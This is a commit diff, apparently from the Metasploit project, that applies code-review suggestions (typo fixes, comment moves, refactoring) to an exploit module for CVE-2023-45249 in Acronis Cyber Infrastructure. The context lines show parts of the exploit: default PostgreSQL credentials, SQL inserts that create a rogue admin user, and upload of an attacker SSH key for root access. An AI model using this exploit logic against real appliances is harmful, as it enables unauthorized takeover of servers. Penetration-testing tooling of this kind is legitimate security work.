Apply suggestions from code review

h00die-gr3y · bcoles · jvoisin · web-flow · commit d7fa23f30fc9 · 2024-09-17T19:00:48.000+02:00
Co-authored-by: bcoles &lt;bcoles@gmail.com&gt;
Co-authored-by: Julien Voisin &lt;jvoisin@users.noreply.github.com&gt;
diff --git a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -118,7 +118,7 @@ Description:
   cloud-native applications in production environments.
   This module exploits a default password vulnerability in ACI which allow an attacker to access
   the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
-  This opens the door for the attacker to upload ssh keys that enables root acces
+  This opens the door for the attacker to upload SSH keys that enables root access
   to the appliance/server. This attack can be remotely executed over the WAN as long as the
   PostgreSQL and SSH services are exposed to the outside world.
   ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
diff --git a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -29,7 +29,7 @@ def initialize(info = {})
           cloud-native applications in production environments.
           This module exploits a default password vulnerability in ACI which allow an attacker to access
           the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
-          This opens the door for the attacker to upload ssh keys that enables root acces
+          This opens the door for the attacker to upload SSH keys that enables root access
           to the appliance/server. This attack can be remotely executed over the WAN as long as the
           PostgreSQL and SSH services are exposed to the outside world.
           ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
@@ -121,8 +121,9 @@ def run_query(query)
     end
   end
 
-  def add_admin_user(username, userid, password)
     # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
+  def add_admin_user(username, userid, password)
+
     vprint_status("Creating admin user #{username} with userid #{userid}")
 
     # add new admin user to the user table
@@ -154,7 +155,7 @@ def add_admin_user(username, userid, password)
     vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")
     return false unless run_query("insert into \"assignment\" values('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F')")
 
-    vprint_status("Succesfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
+    vprint_status("Successfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
     true
   end
 
@@ -180,8 +181,8 @@ def do_sshlogin(ip, user, ssh_opts)
     return true
   end
 
+  # Login at the Acronis Cyber Infrastructure web portal
   def aci_login(name, pwd)
-    # Login at the Acronis Cyber Infrastructure web portal
     post_data = {
       username: name.to_s,
       password: pwd.to_s
@@ -196,13 +197,11 @@ def aci_login(name, pwd)
       'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'),
       'data' => post_data.to_s
     })
-    return true if res&.code == 200
-
-    false
+    return res&.code == 200
   end
 
+  # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
   def upload_sshkey(sshkey)
-    # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
     post_data = {
       key: sshkey.to_s,
       event:
@@ -236,9 +235,8 @@ def execute_command(cmd, _opts = {})
     @timeout = true
   end
 
+  # Return ACI version-release or nil if not found
   def get_aci_version
-    # Return ACI version-release or nil if not found
-    version_release = nil
     res = send_request_cgi({
       'method' => 'GET',
       'ctype' => 'application/json',
@@ -247,16 +245,21 @@ def get_aci_version
       },
       'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')
     })
-    if res&.code == 200 && res.body.include?('storage-release')
-      # parse json response and get the version
-      res_json = res.get_json_document
-      unless res_json.blank?
-        version = res_json['storage-release']['version']
-        release = res_json['storage-release']['release']
-        version_release = Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, '')) unless version.nil? || release.nil?
-      end
-      return version_release
-    end
+
+    return unless res&.code == 200
+    return unless res.body.include?('storage-release')
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    version = res_json['storage-release']['version']
+    return if version.nil?
+
+    release = res_json['storage-release']['release']
+    return if release.nil?
+
+    Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, ''))
   end
 
   def check
@@ -293,7 +296,7 @@ def exploit
 
     # create SSH key pair
     print_status('Creating SSH private and public key.')
-    k = SSHKey.generate(type: 'RSA', bits: 2048)
+    k = SSHKey.generate
     vprint_status(k.private_key)
     vprint_status("#{k.ssh_public_key} root")
 
